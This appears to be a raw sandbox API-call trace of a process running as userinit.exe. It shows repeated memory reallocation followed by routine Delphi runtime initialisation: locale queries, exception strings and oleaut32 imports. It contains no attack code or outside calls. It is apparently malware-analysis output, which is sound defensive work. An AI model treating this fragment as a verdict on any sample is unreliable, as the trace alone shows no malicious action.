[0200.118] GlobalHandle (pMem=0x27f0020) returned 0x68000c
[0200.118] GlobalUnlock (hMem=0x68000c) returned 0
[0200.118] GlobalReAlloc (hMem=0x68000c, dwBytes=0xde000, uFlags=0x2) returned 0x68000c
[0200.132] GlobalLock (hMem=0x68000c) returned 0x2710020
[0200.133] GlobalHandle (pMem=0x2710020) returned 0x68000c
[0200.133] GlobalUnlock (hMem=0x68000c) returned 0
[0200.133] GlobalReAlloc (hMem=0x68000c, dwBytes=0xe0000, uFlags=0x2) returned 0x68000c
[0200.196] GlobalLock (hMem=0x68000c) returned 0x27f0020
[0200.196] GlobalHandle (pMem=0x27f0020) returned 0x68000c
[0200.196] GlobalUnlock (hMem=0x68000c) returned 0
[0200.196] GlobalReAlloc (hMem=0x68000c, dwBytes=0xe2000, uFlags=0x2) returned 0x68000c
[0200.212] GlobalLock (hMem=0x68000c) returned 0x28e0020
[0200.213] GlobalHandle (pMem=0x28e0020) returned 0x68000c
[0200.213] GlobalUnlock (hMem=0x68000c) returned 0
[0200.213] GlobalReAlloc (hMem=0x68000c, dwBytes=0xe4000, uFlags=0x2) returned 0x68000c
[0200.284] GlobalLock (hMem=0x68000c) returned 0x2710020
[0200.285] GlobalHandle (pMem=0x2710020) returned 0x68000c
[0200.285] GlobalUnlock (hMem=0x68000c) returned 0
[0200.285] GlobalReAlloc (hMem=0x68000c, dwBytes=0xe6000, uFlags=0x2) returned 0x68000c
[0200.301] GlobalLock (hMem=0x68000c) returned 0x2800020
[0200.302] GlobalHandle (pMem=0x2800020) returned 0x68000c
[0200.302] GlobalUnlock (hMem=0x68000c) returned 0
[0200.302] GlobalReAlloc (hMem=0x68000c, dwBytes=0xe8000, uFlags=0x2) returned 0x68000c
[0200.317] GlobalLock (hMem=0x68000c) returned 0x2710020
[0200.318] GlobalHandle (pMem=0x2710020) returned 0x68000c
[0200.318] GlobalUnlock (hMem=0x68000c) returned 0
[0200.318] GlobalReAlloc (hMem=0x68000c, dwBytes=0xea000, uFlags=0x2) returned 0x68000c
[0200.381] GlobalLock (hMem=0x68000c) returned 0x2800020
[0200.382] GlobalHandle (pMem=0x2800020) returned 0x68000c
[0200.382] GlobalUnlock (hMem=0x68000c) returned 0
[0200.382] GlobalReAlloc (hMem=0x68000c, dwBytes=0xec000, uFlags=0x2) returned 0x68000c
[0200.397] GlobalLock (hMem=0x68000c) returned 0x2710020
[0200.398] GlobalHandle (pMem=0x2710020) returned 0x68000c
[0200.398] GlobalUnlock (hMem=0x68000c) returned 0
[0200.398] GlobalReAlloc (hMem=0x68000c, dwBytes=0xee000, uFlags=0x2) returned 0x68000c
[0200.414] GlobalLock (hMem=0x68000c) returned 0x2800020
[0200.415] GlobalHandle (pMem=0x2800020) returned 0x68000c
[0200.415] GlobalUnlock (hMem=0x68000c) returned 0
[0200.415] GlobalReAlloc (hMem=0x68000c, dwBytes=0xf0000, uFlags=0x2) returned 0x68000c
[0200.477] GlobalLock (hMem=0x68000c) returned 0x28f0020
[0200.478] GlobalHandle (pMem=0x28f0020) returned 0x68000c
[0200.478] GlobalUnlock (hMem=0x68000c) returned 0
[0200.478] GlobalReAlloc (hMem=0x68000c, dwBytes=0xf2000, uFlags=0x2) returned 0x68000c
[0200.494] GlobalLock (hMem=0x68000c) returned 0x2710020
[0200.495] GlobalHandle (pMem=0x2710020) returned 0x68000c
[0200.495] GlobalUnlock (hMem=0x68000c) returned 0
[0200.495] GlobalReAlloc (hMem=0x68000c, dwBytes=0xf4000, uFlags=0x2) returned 0x68000c
[0200.513] GlobalLock (hMem=0x68000c) returned 0x2810020
[0200.514] GlobalHandle (pMem=0x2810020) returned 0x68000c
[0200.514] GlobalUnlock (hMem=0x68000c) returned 0
[0200.514] GlobalReAlloc (hMem=0x68000c, dwBytes=0xf6000, uFlags=0x2) returned 0x68000c
[0200.565] GlobalLock (hMem=0x68000c) returned 0x2710020
[0200.566] GlobalHandle (pMem=0x2710020) returned 0x68000c
[0200.566] GlobalUnlock (hMem=0x68000c) returned 0
[0200.566] GlobalReAlloc (hMem=0x68000c, dwBytes=0xf8000, uFlags=0x2) returned 0x68000c
[0200.583] GlobalLock (hMem=0x68000c) returned 0x2810020
[0200.584] GlobalHandle (pMem=0x2810020) returned 0x68000c
[0200.584] GlobalUnlock (hMem=0x68000c) returned 0
[0200.584] GlobalReAlloc (hMem=0x68000c, dwBytes=0xfa000, uFlags=0x2) returned 0x68000c
[0200.647] GlobalLock (hMem=0x68000c) returned 0x2710020
[0200.648] GlobalHandle (pMem=0x2710020) returned 0x68000c
[0200.648] GlobalUnlock (hMem=0x68000c) returned 0
[0200.648] GlobalReAlloc (hMem=0x68000c, dwBytes=0xfc000, uFlags=0x2) returned 0x68000c
[0200.664] GlobalLock (hMem=0x68000c) returned 0x2810020
[0200.665] GlobalHandle (pMem=0x2810020) returned 0x68000c
[0200.665] GlobalUnlock (hMem=0x68000c) returned 0
[0200.665] GlobalReAlloc (hMem=0x68000c, dwBytes=0xfe000, uFlags=0x2) returned 0x68000c
[0200.682] GlobalLock (hMem=0x68000c) returned 0x2710020
[0200.683] GlobalHandle (pMem=0x2710020) returned 0x68000c
[0200.683] GlobalUnlock (hMem=0x68000c) returned 0
[0200.683] GlobalReAlloc (hMem=0x68000c, dwBytes=0x100000, uFlags=0x2) returned 0x68000c
[0200.751] GlobalLock (hMem=0x68000c) returned 0x2810020
[0200.752] GlobalHandle (pMem=0x2810020) returned 0x68000c
[0200.752] GlobalUnlock (hMem=0x68000c) returned 0
[0200.752] GlobalReAlloc (hMem=0x68000c, dwBytes=0x102000, uFlags=0x2) returned 0x68000c
[0200.818] GlobalLock (hMem=0x68000c) returned 0x2920020
[0200.819] GlobalHandle (pMem=0x2920020) returned 0x68000c
[0200.819] GlobalUnlock (hMem=0x68000c) returned 0
[0200.819] GlobalReAlloc (hMem=0x68000c, dwBytes=0x104000, uFlags=0x2) returned 0x68000c
[0200.836] GlobalLock (hMem=0x68000c) returned 0x2710020
[0200.837] GlobalHandle (pMem=0x2710020) returned 0x68000c
[0200.837] GlobalUnlock (hMem=0x68000c) returned 0
[0200.837] GlobalReAlloc (hMem=0x68000c, dwBytes=0x106000, uFlags=0x2) returned 0x68000c
[0200.854] GlobalLock (hMem=0x68000c) returned 0x2820020
[0200.855] GlobalHandle (pMem=0x2820020) returned 0x68000c
[0200.855] GlobalUnlock (hMem=0x68000c) returned 0
[0200.855] GlobalReAlloc (hMem=0x68000c, dwBytes=0x108000, uFlags=0x2) returned 0x68000c
[0200.919] GlobalLock (hMem=0x68000c) returned 0x2710020
[0200.920] GlobalHandle (pMem=0x2710020) returned 0x68000c
[0200.920] GlobalUnlock (hMem=0x68000c) returned 0
[0200.920] GlobalReAlloc (hMem=0x68000c, dwBytes=0x10a000, uFlags=0x2) returned 0x68000c
[0200.945] GlobalLock (hMem=0x68000c) returned 0x2820020
[0200.946] GlobalHandle (pMem=0x2820020) returned 0x68000c
[0200.946] GlobalUnlock (hMem=0x68000c) returned 0
[0200.946] GlobalReAlloc (hMem=0x68000c, dwBytes=0x10c000, uFlags=0x2) returned 0x68000c
[0201.012] GlobalLock (hMem=0x68000c) returned 0x2710020
[0201.013] VirtualAlloc (lpAddress=0x0, dwSize=0x110000, flAllocationType=0x2000, flProtect=0x1) returned 0x2820000
[0201.013] VirtualAlloc (lpAddress=0x2820000, dwSize=0x10c000, flAllocationType=0x1000, flProtect=0x4) returned 0x2820000
[0201.113] GetKeyboardType (nTypeFlag=0) returned 4
[0201.113] GetCommandLineA () returned="\"C:\\Windows\\System32\\userinit.exe\""
[0201.113] GetStartupInfoA (in: lpStartupInfo=0x22f3f0 | out: lpStartupInfo=0x22f3f0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\userinit.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff))
[0201.113] GetVersion () returned 0x1db10106
[0201.113] GetVersion () returned 0x1db10106
[0201.113] GetCurrentThreadId () returned 0x8e4
[0201.113] GetModuleFileNameA (in: hModule=0x2930000, lpFilename=0x22eeec, nSize=0x105 | out: lpFilename="\xfc\xee\x22" (normalized: "c:\\windows\\system32\\üî\"")) returned 0x0
[0201.113] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x22edc7, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0201.114] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x22eedc | out: phkResult=0x22eedc*=0x0) returned 0x2
[0201.114] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x22eedc | out: phkResult=0x22eedc*=0x0) returned 0x2
[0201.114] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x22eedc | out: phkResult=0x22eedc*=0x0) returned 0x2
[0201.114] lstrcpynA (in: lpString1=0x22edc7, lpString2="\xfc\xee\x22", iMaxLength=261 | out: lpString1="\xfc\xee\x22") returned="\xfc\xee\x22"
[0201.114] GetThreadLocale () returned 0x409
[0201.114] GetLocaleInfoA (in: Locale=0x409, LCType=0x3, lpLCData=0x22eed7, cchData=5 | out: lpLCData="ENU") returned 4
[0201.114] lstrlenA (lpString="\xfc\xee\x22") returned 3
[0201.114] LoadStringA (in: hInstance=0x2930000, uID=0xffc4, lpBuffer=0x22f010, cchBufferMax=1024 | out: lpBuffer="Exception in safecall method") returned 0x1c
[0201.114] LocalAlloc (uFlags=0x0, uBytes=0xff8) returned 0x9dcc0
[0201.114] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x2000, flProtect=0x1) returned 0x2a50000
[0201.114] LocalAlloc (uFlags=0x0, uBytes=0x644) returned 0x9ecc0
[0201.114] VirtualAlloc (lpAddress=0x2a50000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x2a50000
[0201.114] LoadStringA (in: hInstance=0x2930000, uID=0xffc3, lpBuffer=0x22f010, cchBufferMax=1024 | out: lpBuffer="Interface not supported") returned 0x17
[0201.114] LoadStringA (in: hInstance=0x2930000, uID=0xffc1, lpBuffer=0x22f010, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15
[0201.114] LoadStringA (in: hInstance=0x2930000, uID=0xffc2, lpBuffer=0x22f010, cchBufferMax=1024 | out: lpBuffer="Assertion failed") returned 0x10
[0201.114] LoadStringA (in: hInstance=0x2930000, uID=0xffd4, lpBuffer=0x22f010, cchBufferMax=1024 | out: lpBuffer="Variant or safe array index out of bounds") returned 0x29
[0201.114] LoadStringA (in: hInstance=0x2930000, uID=0xffdd, lpBuffer=0x22f010, cchBufferMax=1024 | out: lpBuffer="Invalid argument") returned 0x10
[0201.114] LoadStringA (in: hInstance=0x2930000, uID=0xffd3, lpBuffer=0x22f010, cchBufferMax=1024 | out: lpBuffer="Error creating variant or safe array") returned 0x24
[0201.114] LoadStringA (in: hInstance=0x2930000, uID=0xffd0, lpBuffer=0x22f010, cchBufferMax=1024 | out: lpBuffer="Variant method calls not supported") returned 0x22
[0201.115] LoadStringA (in: hInstance=0x2930000, uID=0xffd7, lpBuffer=0x22f010, cchBufferMax=1024 | out: lpBuffer="Invalid variant operation") returned 0x19
[0201.115] LoadStringA (in: hInstance=0x2930000, uID=0xffd6, lpBuffer=0x22f010, cchBufferMax=1024 | out: lpBuffer="Invalid variant type conversion") returned 0x1f
[0201.115] LoadStringA (in: hInstance=0x2930000, uID=0xffe8, lpBuffer=0x22f010, cchBufferMax=1024 | out: lpBuffer="Stack overflow") returned 0xe
[0201.115] LoadStringA (in: hInstance=0x2930000, uID=0xffe9, lpBuffer=0x22f010, cchBufferMax=1024 | out: lpBuffer="Control-C hit") returned 0xd
[0201.115] LoadStringA (in: hInstance=0x2930000, uID=0xffea, lpBuffer=0x22f010, cchBufferMax=1024 | out: lpBuffer="Privileged instruction") returned 0x16
[0201.115] LoadStringA (in: hInstance=0x2930000, uID=0xffe7, lpBuffer=0x22f010, cchBufferMax=1024 | out: lpBuffer="Access violation") returned 0x10
[0201.115] LoadStringA (in: hInstance=0x2930000, uID=0xffe5, lpBuffer=0x22f010, cchBufferMax=1024 | out: lpBuffer="Invalid class typecast") returned 0x16
[0201.115] LoadStringA (in: hInstance=0x2930000, uID=0xffe3, lpBuffer=0x22f010, cchBufferMax=1024 | out: lpBuffer="Floating point underflow") returned 0x18
[0201.115] LoadStringA (in: hInstance=0x2930000, uID=0xffe2, lpBuffer=0x22f010, cchBufferMax=1024 | out: lpBuffer="Floating point overflow") returned 0x17
[0201.115] LoadStringA (in: hInstance=0x2930000, uID=0xffe1, lpBuffer=0x22f010, cchBufferMax=1024 | out: lpBuffer="Floating point division by zero") returned 0x1f
[0201.115] LoadStringA (in: hInstance=0x2930000, uID=0xffe0, lpBuffer=0x22f010, cchBufferMax=1024 | out: lpBuffer="Invalid floating point operation") returned 0x20
[0201.115] LoadStringA (in: hInstance=0x2930000, uID=0xffff, lpBuffer=0x22f010, cchBufferMax=1024 | out: lpBuffer="Integer overflow") returned 0x10
[0201.115] LoadStringA (in: hInstance=0x2930000, uID=0xfffe, lpBuffer=0x22f010, cchBufferMax=1024 | out: lpBuffer="Range check error") returned 0x11
[0201.115] LoadStringA (in: hInstance=0x2930000, uID=0xfffd, lpBuffer=0x22f010, cchBufferMax=1024 | out: lpBuffer="Division by zero") returned 0x10
[0201.115] LoadStringA (in: hInstance=0x2930000, uID=0xfffc, lpBuffer=0x22f010, cchBufferMax=1024 | out: lpBuffer="Invalid numeric input") returned 0x15
[0201.115] LoadStringA (in: hInstance=0x2930000, uID=0xfffb, lpBuffer=0x22f010, cchBufferMax=1024 | out: lpBuffer="Disk full") returned 0x9
[0201.115] LoadStringA (in: hInstance=0x2930000, uID=0xfffa, lpBuffer=0x22f010, cchBufferMax=1024 | out: lpBuffer="Read beyond end of file") returned 0x17
[0201.115] LoadStringA (in: hInstance=0x2930000, uID=0xfff9, lpBuffer=0x22f010, cchBufferMax=1024 | out: lpBuffer="File access denied") returned 0x12
[0201.115] LoadStringA (in: hInstance=0x2930000, uID=0xfff8, lpBuffer=0x22f010, cchBufferMax=1024 | out: lpBuffer="Too many open files") returned 0x13
[0201.115] LoadStringA (in: hInstance=0x2930000, uID=0xfff7, lpBuffer=0x22f010, cchBufferMax=1024 | out: lpBuffer="Invalid filename") returned 0x10
[0201.115] LoadStringA (in: hInstance=0x2930000, uID=0xfff6, lpBuffer=0x22f010, cchBufferMax=1024 | out: lpBuffer="File not found") returned 0xe
[0201.115] LoadStringA (in: hInstance=0x2930000, uID=0xfff4, lpBuffer=0x22effc, cchBufferMax=1024 | out: lpBuffer="Out of memory") returned 0xd
[0201.115] LoadStringA (in: hInstance=0x2930000, uID=0xffe4, lpBuffer=0x22effc, cchBufferMax=1024 | out: lpBuffer="Invalid pointer operation") returned 0x19
[0201.115] GetVersionExA (in: lpVersionInformation=0x22f394*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x2930000, dwMinorVersion=0x0, dwBuildNumber=0x28, dwPlatformId=0x65636341, szCSDVersion="ssibleObjectFromr<\x93\x02·\"\x93\x02,ô\"") | out: lpVersionInformation=0x22f394*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0201.115] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0201.115] GetProcAddress (hModule=0x75370000, lpProcName="GetDiskFreeSpaceExA") returned 0x753ff46f
[0201.115] GetThreadLocale () returned 0x409
[0201.115] GetThreadLocale () returned 0x409
[0201.115] GetLocaleInfoA (in: Locale=0x409, LCType=0x44, lpLCData=0x22f26c, cchData=256 | out: lpLCData="Jan") returned 4
[0201.115] GetLocaleInfoA (in: Locale=0x409, LCType=0x38, lpLCData=0x22f26c, cchData=256 | out: lpLCData="January") returned 8
[0201.115] GetLocaleInfoA (in: Locale=0x409, LCType=0x45, lpLCData=0x22f26c, cchData=256 | out: lpLCData="Feb") returned 4
[0201.115] GetLocaleInfoA (in: Locale=0x409, LCType=0x39, lpLCData=0x22f26c, cchData=256 | out: lpLCData="February") returned 9
[0201.115] GetLocaleInfoA (in: Locale=0x409, LCType=0x46, lpLCData=0x22f26c, cchData=256 | out: lpLCData="Mar") returned 4
[0201.115] GetLocaleInfoA (in: Locale=0x409, LCType=0x3a, lpLCData=0x22f26c, cchData=256 | out: lpLCData="March") returned 6
[0201.115] GetLocaleInfoA (in: Locale=0x409, LCType=0x47, lpLCData=0x22f26c, cchData=256 | out: lpLCData="Apr") returned 4
[0201.115] GetLocaleInfoA (in: Locale=0x409, LCType=0x3b, lpLCData=0x22f26c, cchData=256 | out: lpLCData="April") returned 6
[0201.116] GetLocaleInfoA (in: Locale=0x409, LCType=0x48, lpLCData=0x22f26c, cchData=256 | out: lpLCData="May") returned 4
[0201.116] GetLocaleInfoA (in: Locale=0x409, LCType=0x3c, lpLCData=0x22f26c, cchData=256 | out: lpLCData="May") returned 4
[0201.116] GetLocaleInfoA (in: Locale=0x409, LCType=0x49, lpLCData=0x22f26c, cchData=256 | out: lpLCData="Jun") returned 4
[0201.116] GetLocaleInfoA (in: Locale=0x409, LCType=0x3d, lpLCData=0x22f26c, cchData=256 | out: lpLCData="June") returned 5
[0201.116] GetLocaleInfoA (in: Locale=0x409, LCType=0x4a, lpLCData=0x22f26c, cchData=256 | out: lpLCData="Jul") returned 4
[0201.116] GetLocaleInfoA (in: Locale=0x409, LCType=0x3e, lpLCData=0x22f26c, cchData=256 | out: lpLCData="July") returned 5
[0201.116] GetLocaleInfoA (in: Locale=0x409, LCType=0x4b, lpLCData=0x22f26c, cchData=256 | out: lpLCData="Aug") returned 4
[0201.116] GetLocaleInfoA (in: Locale=0x409, LCType=0x3f, lpLCData=0x22f26c, cchData=256 | out: lpLCData="August") returned 7
[0201.116] GetLocaleInfoA (in: Locale=0x409, LCType=0x4c, lpLCData=0x22f26c, cchData=256 | out: lpLCData="Sep") returned 4
[0201.116] GetLocaleInfoA (in: Locale=0x409, LCType=0x40, lpLCData=0x22f26c, cchData=256 | out: lpLCData="September") returned 10
[0201.116] GetLocaleInfoA (in: Locale=0x409, LCType=0x4d, lpLCData=0x22f26c, cchData=256 | out: lpLCData="Oct") returned 4
[0201.116] GetLocaleInfoA (in: Locale=0x409, LCType=0x41, lpLCData=0x22f26c, cchData=256 | out: lpLCData="October") returned 8
[0201.116] GetLocaleInfoA (in: Locale=0x409, LCType=0x4e, lpLCData=0x22f26c, cchData=256 | out: lpLCData="Nov") returned 4
[0201.116] GetLocaleInfoA (in: Locale=0x409, LCType=0x42, lpLCData=0x22f26c, cchData=256 | out: lpLCData="November") returned 9
[0201.116] GetLocaleInfoA (in: Locale=0x409, LCType=0x4f, lpLCData=0x22f26c, cchData=256 | out: lpLCData="Dec") returned 4
[0201.116] GetLocaleInfoA (in: Locale=0x409, LCType=0x43, lpLCData=0x22f26c, cchData=256 | out: lpLCData="December") returned 9
[0201.116] GetLocaleInfoA (in: Locale=0x409, LCType=0x37, lpLCData=0x22f26c, cchData=256 | out: lpLCData="Sun") returned 4
[0201.116] GetLocaleInfoA (in: Locale=0x409, LCType=0x30, lpLCData=0x22f26c, cchData=256 | out: lpLCData="Sunday") returned 7
[0201.116] GetLocaleInfoA (in: Locale=0x409, LCType=0x31, lpLCData=0x22f26c, cchData=256 | out: lpLCData="Mon") returned 4
[0201.116] GetLocaleInfoA (in: Locale=0x409, LCType=0x2a, lpLCData=0x22f26c, cchData=256 | out: lpLCData="Monday") returned 7
[0201.116] GetLocaleInfoA (in: Locale=0x409, LCType=0x32, lpLCData=0x22f26c, cchData=256 | out: lpLCData="Tue") returned 4
[0201.116] GetLocaleInfoA (in: Locale=0x409, LCType=0x2b, lpLCData=0x22f26c, cchData=256 | out: lpLCData="Tuesday") returned 8
[0201.116] GetLocaleInfoA (in: Locale=0x409, LCType=0x33, lpLCData=0x22f26c, cchData=256 | out: lpLCData="Wed") returned 4
[0201.116] GetLocaleInfoA (in: Locale=0x409, LCType=0x2c, lpLCData=0x22f26c, cchData=256 | out: lpLCData="Wednesday") returned 10
[0201.116] GetLocaleInfoA (in: Locale=0x409, LCType=0x34, lpLCData=0x22f26c, cchData=256 | out: lpLCData="Thu") returned 4
[0201.116] GetLocaleInfoA (in: Locale=0x409, LCType=0x2d, lpLCData=0x22f26c, cchData=256 | out: lpLCData="Thursday") returned 9
[0201.116] GetLocaleInfoA (in: Locale=0x409, LCType=0x35, lpLCData=0x22f26c, cchData=256 | out: lpLCData="Fri") returned 4
[0201.116] GetLocaleInfoA (in: Locale=0x409, LCType=0x2e, lpLCData=0x22f26c, cchData=256 | out: lpLCData="Friday") returned 7
[0201.116] GetLocaleInfoA (in: Locale=0x409, LCType=0x36, lpLCData=0x22f26c, cchData=256 | out: lpLCData="Sat") returned 4
[0201.116] GetLocaleInfoA (in: Locale=0x409, LCType=0x2f, lpLCData=0x22f26c, cchData=256 | out: lpLCData="Saturday") returned 9
[0201.116] GetThreadLocale () returned 0x409
[0201.116] GetLocaleInfoA (in: Locale=0x409, LCType=0x14, lpLCData=0x22f2c8, cchData=256 | out: lpLCData="$") returned 2
[0201.116] GetLocaleInfoA (in: Locale=0x409, LCType=0x1b, lpLCData=0x22f2c8, cchData=256 | out: lpLCData="0") returned 2
[0201.116] GetLocaleInfoA (in: Locale=0x409, LCType=0x1c, lpLCData=0x22f2c8, cchData=256 | out: lpLCData="0") returned 2
[0201.116] GetLocaleInfoA (in: Locale=0x409, LCType=0xf, lpLCData=0x22f3c0, cchData=2 | out: lpLCData=",") returned 2
[0201.116] GetLocaleInfoA (in: Locale=0x409, LCType=0xe, lpLCData=0x22f3c0, cchData=2 | out: lpLCData=".") returned 2
[0201.116] GetLocaleInfoA (in: Locale=0x409, LCType=0x19, lpLCData=0x22f2c8, cchData=256 | out: lpLCData="2") returned 2
[0201.116] GetLocaleInfoA (in: Locale=0x409, LCType=0x1d, lpLCData=0x22f3c0, cchData=2 | out: lpLCData="/") returned 2
[0201.116] GetLocaleInfoA (in: Locale=0x409, LCType=0x1f, lpLCData=0x22f2c8, cchData=256 | out: lpLCData="M/d/yyyy") returned 9
[0201.116] GetThreadLocale () returned 0x409
[0201.116] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x22f294, cchData=256 | out: lpLCData="1") returned 2
[0201.116] GetLocaleInfoA (in: Locale=0x409, LCType=0x20, lpLCData=0x22f2c8, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20
[0201.116] GetThreadLocale () returned 0x409
[0201.117] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x22f294, cchData=256 | out: lpLCData="1") returned 2
[0201.117] GetLocaleInfoA (in: Locale=0x409, LCType=0x1e, lpLCData=0x22f3c0, cchData=2 | out: lpLCData=":") returned 2
[0201.117] GetLocaleInfoA (in: Locale=0x409, LCType=0x28, lpLCData=0x22f2c8, cchData=256 | out: lpLCData="AM") returned 3
[0201.117] GetLocaleInfoA (in: Locale=0x409, LCType=0x29, lpLCData=0x22f2c8, cchData=256 | out: lpLCData="PM") returned 3
[0201.117] GetLocaleInfoA (in: Locale=0x409, LCType=0x25, lpLCData=0x22f2c8, cchData=256 | out: lpLCData="0") returned 2
[0201.117] GetLocaleInfoA (in: Locale=0x409, LCType=0x23, lpLCData=0x22f2c8, cchData=256 | out: lpLCData="0") returned 2
[0201.117] GetLocaleInfoA (in: Locale=0x409, LCType=0x1005, lpLCData=0x22f2c8, cchData=256 | out: lpLCData="0") returned 2
[0201.117] GetLocaleInfoA (in: Locale=0x409, LCType=0xc, lpLCData=0x22f3c0, cchData=2 | out: lpLCData=",") returned 2
[0201.117] GetModuleHandleA (lpModuleName="oleaut32.dll") returned 0x758f0000
[0201.117] GetProcAddress (hModule=0x758f0000, lpProcName="VariantChangeTypeEx") returned 0x758f4c28
[0201.117] GetProcAddress (hModule=0x758f0000, lpProcName="VarNeg") returned 0x7596c802
[0201.117] GetProcAddress (hModule=0x758f0000, lpProcName="VarNot") returned 0x7596ec66
[0201.117] GetProcAddress (hModule=0x758f0000, lpProcName="VarAdd") returned 0x75915934
[0201.117] GetProcAddress (hModule=0x758f0000, lpProcName="VarSub") returned 0x7596d332
[0201.117] GetProcAddress (hModule=0x758f0000, lpProcName="VarMul") returned 0x7596dbd4
[0201.117] GetProcAddress (hModule=0x758f0000, lpProcName="VarDiv") returned 0x7596e405
[0201.117] GetProcAddress (hModule=0x758f0000, lpProcName="VarIdiv") returned 0x7596f00a
[0201.117] GetProcAddress (hModule=0x758f0000, lpProcName="VarMod") returned 0x7596f15e
[0201.117] GetProcAddress (hModule=0x758f0000, lpProcName="VarAnd") returned 0x75915a98
[0201.118] GetProcAddress (hModule=0x758f0000, lpProcName="VarOr") returned 0x7596ecfa
[0201.118] GetProcAddress (hModule=0x758f0000, lpProcName="VarXor") returned 0x7596ee2e
[0201.118] GetProcAddress (hModule=0x758f0000, lpProcName="VarCmp") returned 0x7590b0dc
[0201.118] GetProcAddress (hModule=0x758f0000, lpProcName="VarI4FromStr") returned 0x75906fab
[0201.118] GetProcAddress (hModule=0x758f0000, lpProcName="VarR4FromStr") returned 0x759101a0
[0201.118] GetProcAddress (hModule=0x758f0000, lpProcName="VarR8FromStr") returned 0x7590699e
[0201.118] GetProcAddress (hModule=0x758f0000, lpProcName="VarDateFromStr") returned 0x75916ba7
[0201.118] GetProcAddress (hModule=0x758f0000, lpProcName="VarCyFromStr") returned 0x75936c12
[0201.118] GetProcAddress (hModule=0x758f0000, lpProcName="VarBoolFromStr") returned 0x7590dbd1
[0201.118] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromCy") returned 0x75917fdc
[0201.118] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromDate") returned 0x75907a2a
[0201.118] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromBool") returned 0x75910355
[0201.118] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="") returned 0xa8
[0201.119] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0xa0
[0201.119] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xac
[0201.119] GetModuleHandleA (lpModuleName="USER32.DLL") returned 0x757b0000
[0201.119] GetDC (hWnd=0x0) returned 0x56010821
[0201.119] GetDeviceCaps (hdc=0x56010821, index=90) returned 96
[0201.119] ReleaseDC (hWnd=0x0, hDC=0x56010821) returned 1
[0201.119] GetDC (hWnd=0x0) returned 0x56010821
[0201.119] GetDeviceCaps (hdc=0x56010821, index=104) returned 0
[0201.119] ReleaseDC (hWnd=0x0, hDC=0x56010821) returned 1
[0201.119] CreatePalette (plpal=0x22f024) returned 0x6208085c
[0201.119] GetStockObject (i=7) returned 0x1b00017
[0201.119] GetStockObject (i=5) returned 0x1900015
[0201.119] GetStockObject (i=13) returned 0x18a002e
[0201.119] LoadIconA (hInstance=0x0, lpIconName=0x7f00) returned 0x10027
[0201.119] MulDiv (nNumber=8, nNumerator=96, nDenominator=72) returned 11
[0201.119] LoadStringA (in: hInstance=0x2930000, uID=0xff3d, lpBuffer=0x22f020, cchBufferMax=1024 | out: lpBuffer="Alt+") returned 0x4
[0201.119] LoadStringA (in: hInstance=0x2930000, uID=0xff3c, lpBuffer=0x22f020, cchBufferMax=1024 | out: lpBuffer="Ctrl+") returned 0x5
[0201.120] LoadStringA (in: hInstance=0x2930000, uID=0xff3b, lpBuffer=0x22f020, cchBufferMax=1024 | out: lpBuffer="Shift+") returned 0x6
[0201.120] LoadStringA (in: hInstance=0x2930000, uID=0xff3a, lpBuffer=0x22f020, cchBufferMax=1024 | out: lpBuffer="Del") returned 0x3
[0201.120] LoadStringA (in: hInstance=0x2930000, uID=0xff39, lpBuffer=0x22f020, cchBufferMax=1024 | out: lpBuffer="Ins") returned 0x3
[0201.120] LoadStringA (in: hInstance=0x2930000, uID=0xff38, lpBuffer=0x22f020, cchBufferMax=1024 | out: lpBuffer="Down") returned 0x4
[0201.120] LoadStringA (in: hInstance=0x2930000, uID=0xff37, lpBuffer=0x22f020, cchBufferMax=1024 | out: lpBuffer="Right") returned 0x5
[0201.120] LoadStringA (in: hInstance=0x2930000, uID=0xff36, lpBuffer=0x22f020, cchBufferMax=1024 | out: lpBuffer="Up") returned 0x2
[0201.120] LoadStringA (in: hInstance=0x2930000, uID=0xff35, lpBuffer=0x22f020, cchBufferMax=1024 | out: lpBuffer="Left") returned 0x4
[0201.120] LoadStringA (in: hInstance=0x2930000, uID=0xff34, lpBuffer=0x22f020, cchBufferMax=1024 | out: lpBuffer="Home") returned 0x4
[0201.120] LoadStringA (in: hInstance=0x2930000, uID=0xff33, lpBuffer=0x22f020, cchBufferMax=1024 | out: lpBuffer="End") returned 0x3
[0201.120] LoadStringA (in: hInstance=0x2930000, uID=0xff32, lpBuffer=0x22f020, cchBufferMax=1024 | out: lpBuffer="PgDn") returned 0x4
